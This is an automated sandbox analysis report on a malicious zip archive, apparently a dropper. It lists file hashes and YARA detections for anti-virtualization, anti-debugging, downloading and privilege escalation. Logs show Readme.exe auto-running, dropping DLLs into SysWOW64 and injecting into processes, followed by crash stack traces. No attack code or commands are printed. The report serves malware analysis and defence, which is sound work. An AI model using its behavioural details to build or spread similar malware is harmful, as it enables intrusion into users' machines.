File 148a0a0924609c80_zipfi.dll

Size 75.7KB
Type Zip archive data, at least v1.0 to extract, compression method=store
MD5 5eaefbf3c61d399c5e536acb78d737a2
SHA1 06241697966a04cf65e295e30b9aac6b42b1c8dc
SHA256 148a0a0924609c80cc6d42e3622e08ed162289212691d7cc51faf4898dbfa4b9
SHA512 a1dc7912fd51724d8e94d86fac6afd8da05370010c0762b652fe84fa5b5134b34dfe1ff6404d18a340161a5dd315f7452b7c7db76eaddc8ce4ba1202d5d5413f
CRC32 6BBCAE3D
ssdeep None
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
  • anti_dbg - Checks if being debugged
  • network_udp_sock - Communications over UDP network
  • network_tcp_listen - Listen for incoming communication
  • network_smtp_raw - Communications smtp
  • network_dropper - File downloader/dropper
  • network_tcp_socket - Communications over RAW socket
  • network_dns - Communications use DNS
  • escalate_priv - Escalade priviledges
  • win_mutex - Create or check mutex

Score

This file is very suspicious, with a score of 10 out of 10!

Please note: the scoring system is still in development and should be considered an alpha feature.


Autosubmit (Parent Task ID: 5822691)


Information on Execution

Analysis
Category: FILE
Started: Jan. 29, 2025, 12:32 p.m.
Completed: Jan. 29, 2025, 12:37 p.m.
Duration: 295 seconds
Routing: internet

Analyzer Log

2025-01-25 08:13:43,000 [analyzer] DEBUG: Starting analyzer from: C:\tmpl4240h
2025-01-25 08:13:43,000 [analyzer] DEBUG: Pipe server name: \??\PIPE\doQEOOeGelfNzylmzFkdSffBCy
2025-01-25 08:13:43,015 [analyzer] DEBUG: Log pipe server name: \??\PIPE\OnnjejpHxRZVHxJRZJhToIbjdFYmyqUr
2025-01-25 08:13:43,015 [analyzer] DEBUG: No analysis package specified, trying to detect it automagically.
2025-01-25 08:13:43,015 [analyzer] INFO: Automatically selected analysis package "zip"
2025-01-25 08:13:43,342 [analyzer] DEBUG: Started auxiliary module Curtain
2025-01-25 08:13:43,342 [analyzer] DEBUG: Started auxiliary module DbgView
2025-01-25 08:13:43,750 [analyzer] DEBUG: Started auxiliary module Disguise
2025-01-25 08:13:43,967 [analyzer] DEBUG: Loaded monitor into process with pid 508
2025-01-25 08:13:43,967 [analyzer] DEBUG: Started auxiliary module DumpTLSMasterSecrets
2025-01-25 08:13:43,967 [analyzer] DEBUG: Started auxiliary module Human
2025-01-25 08:13:43,967 [analyzer] DEBUG: Started auxiliary module InstallCertificate
2025-01-25 08:13:43,967 [analyzer] DEBUG: Started auxiliary module Reboot
2025-01-25 08:13:44,046 [analyzer] DEBUG: Started auxiliary module RecentFiles
2025-01-25 08:13:44,046 [analyzer] DEBUG: Started auxiliary module Screenshots
2025-01-25 08:13:44,062 [analyzer] DEBUG: Started auxiliary module Sysmon
2025-01-25 08:13:44,062 [analyzer] DEBUG: Started auxiliary module LoadZer0m0n
2025-01-25 08:13:44,062 [modules.packages.zip] DEBUG: Missing file option, auto executing: Readme.exe
2025-01-25 08:13:44,187 [lib.api.process] INFO: Successfully executed process from path 'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Readme.exe' with arguments '' and pid 2488
2025-01-25 08:13:44,390 [analyzer] DEBUG: Loaded monitor into process with pid 2488
2025-01-25 08:13:44,390 [analyzer] INFO: Added new file to list with pid 2488 and path C:\Windows\SysWOW64\ctfmen.exe
2025-01-25 08:13:44,437 [analyzer] INFO: Added new file to list with pid 2488 and path C:\Windows\SysWOW64\shervans.dll
2025-01-25 08:13:44,453 [analyzer] INFO: Added new file to list with pid 2488 and path C:\Windows\SysWOW64\grcopy.dll
2025-01-25 08:13:44,530 [analyzer] INFO: Added new file to list with pid 2488 and path C:\Windows\SysWOW64\satornas.dll
2025-01-25 08:13:48,592 [analyzer] INFO: Injected into process with pid 1316 and name u'ctfmen.exe'
2025-01-25 08:13:48,733 [analyzer] DEBUG: Loaded monitor into process with pid 1316
2025-01-25 08:13:48,796 [analyzer] INFO: Injected into process with pid 2276 and name u'smnss.exe'
2025-01-25 08:13:48,967 [analyzer] DEBUG: Loaded monitor into process with pid 2276
2025-01-25 08:13:48,967 [analyzer] INFO: Added new file to list with pid 2276 and path C:\Windows\SysWOW64\zipfi.dll
2025-01-25 08:13:49,062 [analyzer] INFO: Added new file to list with pid 2276 and path C:\Windows\SysWOW64\zipfiaq.dll
2025-01-25 08:13:49,187 [analyzer] INFO: Process with pid 2488 has terminated
2025-01-25 08:13:50,187 [analyzer] INFO: Process with pid 1316 has terminated
2025-01-25 08:14:06,187 [analyzer] INFO: Process with pid 2276 has terminated
2025-01-25 08:14:06,187 [analyzer] INFO: Process list is empty, terminating analysis.
2025-01-25 08:14:07,578 [analyzer] INFO: Terminating remaining processes before shutdown.
2025-01-25 08:14:07,608 [analyzer] INFO: Analysis completed.

Cuckoo Log

2025-01-29 12:32:38,134 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:39,194 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:40,240 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:41,310 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:42,370 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:43,403 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:44,438 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:45,465 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:46,491 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:47,533 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:48,567 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:49,601 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:50,638 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:51,667 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:52,705 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:53,737 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:54,770 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:55,953 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:57,001 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:58,093 [cuckoo.core.scheduler] INFO: Task #5848427: acquired machine win7x649 (label=win7x649)
2025-01-29 12:32:58,208 [cuckoo.core.resultserver] DEBUG: Now tracking machine 192.168.168.209 for task #5848427
2025-01-29 12:32:58,584 [cuckoo.auxiliary.sniffer] INFO: Started sniffer with PID 1436026 (interface=vboxnet0, host=192.168.168.209)
2025-01-29 12:32:58,609 [androguard.apk] WARNING: Missing AndroidManifest.xml. Is this an APK file?
2025-01-29 12:32:58,670 [cuckoo.machinery.virtualbox] DEBUG: Starting vm win7x649
2025-01-29 12:32:59,653 [cuckoo.machinery.virtualbox] DEBUG: Restoring virtual machine win7x649 to vmcloak
2025-01-29 12:35:24,131 [cuckoo.core.guest] INFO: Starting analysis #5848427 on guest (id=win7x649, ip=192.168.168.209)
2025-01-29 12:35:25,136 [cuckoo.core.guest] DEBUG: win7x649: not ready yet
2025-01-29 12:35:30,159 [cuckoo.core.guest] INFO: Guest is running Cuckoo Agent 0.10 (id=win7x649, ip=192.168.168.209)
2025-01-29 12:35:30,284 [cuckoo.core.guest] DEBUG: Uploading analyzer to guest (id=win7x649, ip=192.168.168.209, monitor=latest, size=6660546)
2025-01-29 12:35:31,488 [cuckoo.core.resultserver] DEBUG: Task #5848427: live log analysis.log initialized.
2025-01-29 12:35:32,487 [cuckoo.core.resultserver] DEBUG: Task #5848427 is sending a BSON stream
2025-01-29 12:35:32,819 [cuckoo.core.resultserver] DEBUG: Task #5848427 is sending a BSON stream
2025-01-29 12:35:33,661 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'shots/0001.jpg'
2025-01-29 12:35:33,672 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 133465
2025-01-29 12:35:37,173 [cuckoo.core.resultserver] DEBUG: Task #5848427 is sending a BSON stream
2025-01-29 12:35:37,391 [cuckoo.core.resultserver] DEBUG: Task #5848427 is sending a BSON stream
2025-01-29 12:35:46,943 [cuckoo.core.guest] DEBUG: win7x649: analysis #5848427 still processing
2025-01-29 12:35:55,888 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'curtain/1737789247.38.curtain.log'
2025-01-29 12:35:55,893 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 36
2025-01-29 12:35:56,067 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'sysmon/1737789247.53.sysmon.xml'
2025-01-29 12:35:56,201 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 1555094
2025-01-29 12:35:56,223 [cuckoo.core.resultserver] DEBUG: Task #5848427 had connection reset for <Context for LOG>
2025-01-29 12:35:56,234 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'files/de28df3e89f794d4_grcopy.dll'
2025-01-29 12:35:56,240 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 77445
2025-01-29 12:35:56,248 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'files/ba207b4a26b4f41e_zipfi.dll'
2025-01-29 12:35:56,256 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 77563
2025-01-29 12:35:56,266 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'files/183a2d03a872891c_ctfmen.exe'
2025-01-29 12:35:56,280 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 4160
2025-01-29 12:35:56,283 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'files/96bc0520373ce88b_zipfiaq.dll'
2025-01-29 12:35:56,288 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 77559
2025-01-29 12:35:56,290 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'files/f87c062af889854e_satornas.dll'
2025-01-29 12:35:56,294 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 183
2025-01-29 12:35:56,297 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'files/7a3d3de3f670f4bf_shervans.dll'
2025-01-29 12:35:56,302 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 8704
2025-01-29 12:35:59,093 [cuckoo.core.guest] INFO: win7x649: analysis completed successfully
2025-01-29 12:35:59,129 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Redsocks
2025-01-29 12:35:59,158 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Sniffer
2025-01-29 12:36:00,120 [cuckoo.machinery.virtualbox] INFO: Successfully generated memory dump for virtual machine with label win7x649 to path /srv/cuckoo/cwd/storage/analyses/5848427/memory.dmp
2025-01-29 12:36:00,123 [cuckoo.machinery.virtualbox] DEBUG: Stopping vm win7x649
2025-01-29 12:37:32,859 [cuckoo.core.resultserver] DEBUG: Stopped tracking machine 192.168.168.209 for task #5848427
2025-01-29 12:37:33,816 [cuckoo.core.scheduler] DEBUG: Released database task #5848427
2025-01-29 12:37:33,849 [cuckoo.core.scheduler] INFO: Task #5848427: analysis procedure completed

Signatures

Yara rules detected for file (10 events)
description Possibly employs anti-virtualization techniques rule vmdetect
description Checks if being debugged rule anti_dbg
description Communications over UDP network rule network_udp_sock
description Listen for incoming communication rule network_tcp_listen
description Communications smtp rule network_smtp_raw
description File downloader/dropper rule network_dropper
description Communications over RAW socket rule network_tcp_socket
description Communications use DNS rule network_dns
description Escalade priviledges rule escalate_priv
description Create or check mutex rule win_mutex
Checks if process is being debugged by a debugger (2 events)
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
One or more processes crashed (15 events)
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

exception.instruction_r: 31 06 8a 46 01 32 06 32 46 02 38 46 03 0f 85 97
exception.symbol: RtlImageNtHeader+0x1224 RtlDeleteCriticalSection-0x26d ntdll+0x343b8
exception.instruction: xor dword ptr [esi], eax
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 213944
exception.address: 0x77ba43b8
registers.esp: 68155584
registers.edi: 7340032
registers.eax: 1205673936
registers.ebp: 68155624
registers.edx: 2047
registers.ebx: 3481048
registers.esi: 3253200
registers.ecx: 104
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0xac6 RtlDeleteCriticalSection-0x9cb ntdll+0x33c5a @ 0x77ba3c5a
RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cfe @ 0x77ba3cfe
DnsApiFree+0x4a DnsApiAlloc-0x2e dnsapi+0x3195 @ 0x74aa3195
DnsApiFree+0x22 DnsApiAlloc-0x56 dnsapi+0x316d @ 0x74aa316d
WSPStartup-0x36b4 mswsock+0x53f7 @ 0x73af53f7
WSPStartup-0x3730 mswsock+0x537b @ 0x73af537b
WSPStartup-0x386f mswsock+0x523c @ 0x73af523c
WSALookupServiceBeginW+0x257 WSAEventSelect-0xade ws2_32+0x59b1 @ 0x76d959b1
WSALookupServiceBeginW+0x233 WSAEventSelect-0xb02 ws2_32+0x598d @ 0x76d9598d
WSALookupServiceBeginW+0x1c2 WSAEventSelect-0xb73 ws2_32+0x591c @ 0x76d9591c
WSALookupServiceBeginW+0x72 WSAEventSelect-0xcc3 ws2_32+0x57cc @ 0x76d957cc
WSALookupServiceBeginA+0x74 WahCloseApcHelper-0x3b1 ws2_32+0xa6b6 @ 0x76d9a6b6
gethostname+0x1bd WSALookupServiceNextA-0x63 ws2_32+0xa218 @ 0x76d9a218
gethostbyname+0xe7 WSCInstallProviderAndChains-0x1039 ws2_32+0x1775a @ 0x76da775a
New_ws2_32_gethostbyname@4+0xab New_ws2_32_getsockname@12-0x63 @ 0x7426c3e3
smnss+0x6326 @ 0x406326
smnss+0x600e @ 0x40600e
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

exception.instruction_r: 8b 49 04 89 55 ec 8b 12 3b d1 0f 85 fa 25 03 00
exception.symbol: RtlCleanUpTEBLangLists+0x9a RtlGetLastWin32Error-0x3a3 ntdll+0x58118
exception.instruction: mov ecx, dword ptr [ecx + 4]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 360728
exception.address: 0x77bc8118
registers.esp: 68153040
registers.edi: 3481000
registers.eax: 3481056
registers.ebp: 68153076
registers.edx: 3481136
registers.ebx: 3473408
registers.esi: 3481048
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

exception.instruction_r: 31 06 8a 46 01 32 06 32 46 02 38 46 03 0f 85 97
exception.symbol: RtlImageNtHeader+0x1224 RtlDeleteCriticalSection-0x26d ntdll+0x343b8
exception.instruction: xor dword ptr [esi], eax
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 213944
exception.address: 0x77ba43b8
registers.esp: 68155584
registers.edi: 7340032
registers.eax: 1205673936
registers.ebp: 68155624
registers.edx: 2047
registers.ebx: 3481640
registers.esi: 3253392
registers.ecx: 114
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0xac6 RtlDeleteCriticalSection-0x9cb ntdll+0x33c5a @ 0x77ba3c5a
RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cfe @ 0x77ba3cfe
DnsApiFree+0x4a DnsApiAlloc-0x2e dnsapi+0x3195 @ 0x74aa3195
DnsApiFree+0x22 DnsApiAlloc-0x56 dnsapi+0x316d @ 0x74aa316d
WSPStartup-0x36b4 mswsock+0x53f7 @ 0x73af53f7
WSPStartup-0x3730 mswsock+0x537b @ 0x73af537b
WSPStartup-0x386f mswsock+0x523c @ 0x73af523c
WSALookupServiceBeginW+0x257 WSAEventSelect-0xade ws2_32+0x59b1 @ 0x76d959b1
WSALookupServiceBeginW+0x233 WSAEventSelect-0xb02 ws2_32+0x598d @ 0x76d9598d
WSALookupServiceBeginW+0x1c2 WSAEventSelect-0xb73 ws2_32+0x591c @ 0x76d9591c
WSALookupServiceBeginW+0x72 WSAEventSelect-0xcc3 ws2_32+0x57cc @ 0x76d957cc
WSALookupServiceBeginA+0x74 WahCloseApcHelper-0x3b1 ws2_32+0xa6b6 @ 0x76d9a6b6
gethostname+0x1bd WSALookupServiceNextA-0x63 ws2_32+0xa218 @ 0x76d9a218
gethostbyname+0xe7 WSCInstallProviderAndChains-0x1039 ws2_32+0x1775a @ 0x76da775a
New_ws2_32_gethostbyname@4+0xab New_ws2_32_getsockname@12-0x63 @ 0x7426c3e3
smnss+0x6326 @ 0x406326
smnss+0x600e @ 0x40600e
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

exception.instruction_r: 8b 49 04 89 55 ec 8b 12 3b d1 0f 85 fa 25 03 00
exception.symbol: RtlCleanUpTEBLangLists+0x9a RtlGetLastWin32Error-0x3a3 ntdll+0x58118
exception.instruction: mov ecx, dword ptr [ecx + 4]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 360728
exception.address: 0x77bc8118
registers.esp: 68153040
registers.edi: 3481512
registers.eax: 3481648
registers.ebp: 68153076
registers.edx: 3475440
registers.ebx: 3473408
registers.esi: 3481640
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

exception.instruction_r: 8b 06 89 45 e4 33 47 50 8a c8 32 cc 89 45 e4 32
exception.symbol: RtlImageNtHeader+0x139 RtlDeleteCriticalSection-0x1358 ntdll+0x332cd
exception.instruction: mov eax, dword ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209613
exception.address: 0x77ba32cd
registers.esp: 68155584
registers.edi: 7340032
registers.eax: 20993
registers.ebp: 68155624
registers.edx: 2047
registers.ebx: 3483016
registers.esi: 3650960
registers.ecx: 1
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

exception.instruction_r: 8b 06 89 45 e4 33 47 50 8a c8 32 cc 89 45 e4 32
exception.symbol: RtlImageNtHeader+0x139 RtlDeleteCriticalSection-0x1358 ntdll+0x332cd
exception.instruction: mov eax, dword ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209613
exception.address: 0x77ba32cd
registers.esp: 70252736
registers.edi: 7340032
registers.eax: 20993
registers.ebp: 70252776
registers.edx: 2047
registers.ebx: 3480344
registers.esi: 3648288
registers.ecx: 173
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

exception.instruction_r: 31 06 8a 46 01 32 06 32 46 02 38 46 03 0f 85 97
exception.symbol: RtlImageNtHeader+0x1224 RtlDeleteCriticalSection-0x26d ntdll+0x343b8
exception.instruction: xor dword ptr [esi], eax
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 213944
exception.address: 0x77ba43b8
registers.esp: 72349888
registers.edi: 7340032
registers.eax: 1205673936
registers.ebp: 72349928
registers.edx: 2047
registers.ebx: 3485592
registers.esi: 3257392
registers.ecx: 12
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

exception.instruction_r: 8b 06 89 45 e4 33 47 50 8a c8 32 cc 89 45 e4 32
exception.symbol: RtlImageNtHeader+0x139 RtlDeleteCriticalSection-0x1358 ntdll+0x332cd
exception.instruction: mov eax, dword ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209613
exception.address: 0x77ba32cd
registers.esp: 74447040
registers.edi: 7340032
registers.eax: 20993
registers.ebp: 74447080
registers.edx: 2047
registers.ebx: 3483944
registers.esi: 3651888
registers.ecx: 65
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

exception.instruction_r: 8b 06 89 45 e4 33 47 50 8a c8 32 cc 89 45 e4 32
exception.symbol: RtlImageNtHeader+0x139 RtlDeleteCriticalSection-0x1358 ntdll+0x332cd
exception.instruction: mov eax, dword ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209613
exception.address: 0x77ba32cd
registers.esp: 76544192
registers.edi: 7340032
registers.eax: 20993
registers.ebp: 76544232
registers.edx: 2047
registers.ebx: 3480616
registers.esi: 3648560
registers.ecx: 1
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0xac6 RtlDeleteCriticalSection-0x9cb ntdll+0x33c5a @ 0x77ba3c5a
RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cfe @ 0x77ba3cfe
DnsApiFree+0x4a DnsApiAlloc-0x2e dnsapi+0x3195 @ 0x74aa3195
DnsApiFree+0x22 DnsApiAlloc-0x56 dnsapi+0x316d @ 0x74aa316d
WSPStartup-0x36b4 mswsock+0x53f7 @ 0x73af53f7
WSPStartup-0x3730 mswsock+0x537b @ 0x73af537b
WSPStartup-0x386f mswsock+0x523c @ 0x73af523c
WSALookupServiceBeginW+0x257 WSAEventSelect-0xade ws2_32+0x59b1 @ 0x76d959b1
WSALookupServiceBeginW+0x233 WSAEventSelect-0xb02 ws2_32+0x598d @ 0x76d9598d
WSALookupServiceBeginW+0x1c2 WSAEventSelect-0xb73 ws2_32+0x591c @ 0x76d9591c
WSALookupServiceBeginW+0x72 WSAEventSelect-0xcc3 ws2_32+0x57cc @ 0x76d957cc
WSALookupServiceBeginA+0x74 WahCloseApcHelper-0x3b1 ws2_32+0xa6b6 @ 0x76d9a6b6
gethostname+0x1bd WSALookupServiceNextA-0x63 ws2_32+0xa218 @ 0x76d9a218
gethostbyname+0xe7 WSCInstallProviderAndChains-0x1039 ws2_32+0x1775a @ 0x76da775a
New_ws2_32_gethostbyname@4+0xab New_ws2_32_getsockname@12-0x63 @ 0x7426c3e3
smnss+0x6326 @ 0x406326
smnss+0x600e @ 0x40600e
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

exception.instruction_r: 8b 49 04 89 55 ec 8b 12 3b d1 0f 85 fa 25 03 00
exception.symbol: RtlCleanUpTEBLangLists+0x9a RtlGetLastWin32Error-0x3a3 ntdll+0x58118
exception.instruction: mov ecx, dword ptr [ecx + 4]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 360728
exception.address: 0x77bc8118
registers.esp: 76541648
registers.edi: 3480536
registers.eax: 3480624
registers.ebp: 76541684
registers.edx: 3484032
registers.ebx: 3473408
registers.esi: 3480616
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

